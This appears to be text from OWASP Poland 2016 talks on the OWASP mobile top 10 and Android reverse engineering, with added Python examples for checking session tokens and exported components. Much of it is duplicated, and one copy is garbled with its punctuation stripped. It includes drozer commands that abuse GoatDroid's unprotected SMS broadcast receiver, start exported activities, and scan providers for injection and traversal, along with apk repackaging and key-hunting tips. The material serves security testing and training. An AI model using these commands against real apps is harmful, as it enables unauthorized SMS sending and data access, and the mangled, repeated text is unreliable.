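The token checks from the "how to find" slide and the generation and expiry rules from the mitigations, as an added example written for this transcript (not code from the talk). Given session tokens captured with a proxy (the three token lists below are constructed samples), it flags the weaknesses named on the slides: a token that is really a device identifier, tokens that increment, token reuse, and tokens with too little entropy to be random. It then shows the server-side half: a token from the OS CSPRNG and an expiry check using the slide's 30-minute window. The 64-bit threshold and the 15-digit device-ID pattern are assumptions.

```python
"""Session token quality checks and a correct token lifecycle.

Added example, not part of the talk. The token lists at the bottom are
constructed samples; MIN_TOKEN_BITS and IMEI_LIKE are assumptions.
"""
import math
import re
import secrets
import time

IMEI_LIKE = re.compile(r"^\d{15}$")     # device-ID shaped, an assumption for the demo
HEX = re.compile(r"[0-9a-fA-F]+")
MIN_TOKEN_BITS = 64
TOKEN_TTL_SECONDS = 30 * 60              # the 30-minute window from the slide


def is_sequential(tokens: list) -> bool:
    """True if the tokens parse as numbers and consecutive ones differ by a constant."""
    if len(tokens) < 3:
        return False
    try:
        values = [int(t, 16) if HEX.fullmatch(t) else int(t) for t in tokens]
    except ValueError:
        return False
    deltas = {b - a for a, b in zip(values, values[1:])}
    return len(deltas) == 1


def max_entropy_bits(token: str) -> float:
    """Upper bound on randomness given the alphabet actually used in the token."""
    alphabet = len(set(token))
    return len(token) * math.log2(alphabet) if alphabet > 1 else 0.0


def assess_tokens(tokens: list, min_bits: int = MIN_TOKEN_BITS) -> list:
    """Human-readable findings; an empty list means nothing obvious was found."""
    findings = []
    if any(IMEI_LIKE.match(t) for t in tokens):
        findings.append("token looks like a device identifier (15 digits)")
    if is_sequential(tokens):
        findings.append("tokens are sequential: other sessions can be guessed")
    if len(set(tokens)) != len(tokens):
        findings.append("token reuse across sessions")
    for t in tokens:
        bits = max_entropy_bits(t)
        if bits < min_bits:
            findings.append(f"token {t!r} carries at most {bits:.0f} bits (< {min_bits})")
            break
    return findings


def new_session_token() -> str:
    """128 bits from the OS CSPRNG; the server stores it, the client only carries it."""
    return secrets.token_hex(16)


def session_is_valid(issued_at: float, now: float, ttl: int = TOKEN_TTL_SECONDS) -> bool:
    """Server-side expiry: a token older than the TTL must be rejected and destroyed."""
    return 0 <= now - issued_at < ttl


# Constructed samples of what a tester might capture with Burp.
DEVICE_ID_TOKENS = ["356938035643809", "356938035643809"]   # device ID reused as the session
SEQUENTIAL_TOKENS = ["000003e8", "000003e9", "000003ea"]      # counter-based tokens
GOOD_TOKENS = [new_session_token() for _ in range(3)]

if __name__ == "__main__":
    for label, sample in (("device id", DEVICE_ID_TOKENS),
                          ("sequential", SEQUENTIAL_TOKENS),
                          ("csprng", GOOD_TOKENS)):
        print(label, assess_tokens(sample) or "no findings")
    issued = time.time()
    print("valid right away:", session_is_valid(issued, issued + 1))
    print("valid after 30 min:", session_is_valid(issued, issued + TOKEN_TTL_SECONDS))
```

The entropy figure is only an upper bound from the characters observed, so a token that passes it is not proven random; a token that fails it is certainly not.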
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez – OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – dex2jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // no check of who sent the broadcast: whatever arrives in the extras is sent as an SMS
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
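The manifest check behind the "Enumerate receivers" step and the two defenses above, as an added Python example (not code from the workshop and not drozer's own): it parses an AndroidManifest.xml and reports every component that other apps can reach yet that carries no android:permission. The manifest it scans is constructed from the GoatDroid receiver shown above plus a hardened copy; the InternalOnlyReceiver, Main activity and USE_MAIN permission names are made up for the example.

```python
"""Flag exported Android components that carry no permission.

Added example, not from the workshop slides. It applies the rule Android
used before API level 31: a component is reachable from other apps when it
declares android:exported="true", or when it declares an <intent-filter>
and leaves android:exported unset. Such a component is reported unless it
is guarded by an android:permission attribute.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None when absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """True when other apps can reach this component.

    An explicit android:exported wins. Otherwise a component with an
    <intent-filter> defaults to exported; a provider with nothing set is
    treated as not exported (the default since API 17).
    """
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return False
    return component.find("intent-filter") is not None


def find_unprotected_exports(manifest_xml):
    """Return (tag, name, reason) for exported components without a permission."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for app in root.iter("application"):
        for comp in app:
            if comp.tag not in COMPONENT_TAGS or not is_exported(comp):
                continue
            if _attr(comp, "permission"):
                continue  # guarded by a custom or system permission
            if _attr(comp, "exported") is not None:
                reason = 'android:exported="true"'
            else:
                reason = "intent-filter with android:exported unset"
            findings.append((comp.tag, _attr(comp, "name"), reason))
    return findings


# Constructed sample: the GoatDroid receiver from the slides, a copy fixed
# with android:exported="false", and an activity guarded by a made-up
# custom permission, so both outcomes of the check are visible.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
              android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".broadcastreceivers.InternalOnlyReceiver"
              android:exported="false">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.INTERNAL" />
      </intent-filter>
    </receiver>
    <activity android:name=".activities.Main" android:exported="true"
              android:permission="org.owasp.goatdroid.fourgoats.USE_MAIN" />
  </application>
</manifest>
"""

if __name__ == "__main__":
    for tag, name, reason in find_unprotected_exports(SAMPLE_MANIFEST):
        print("%s %s is reachable (%s) and has no android:permission" % (tag, name, reason))
```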
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa – OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean „incorrectly"?
• Insecure implementations are:
  – Using known weak ciphers/versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a „chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1 etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
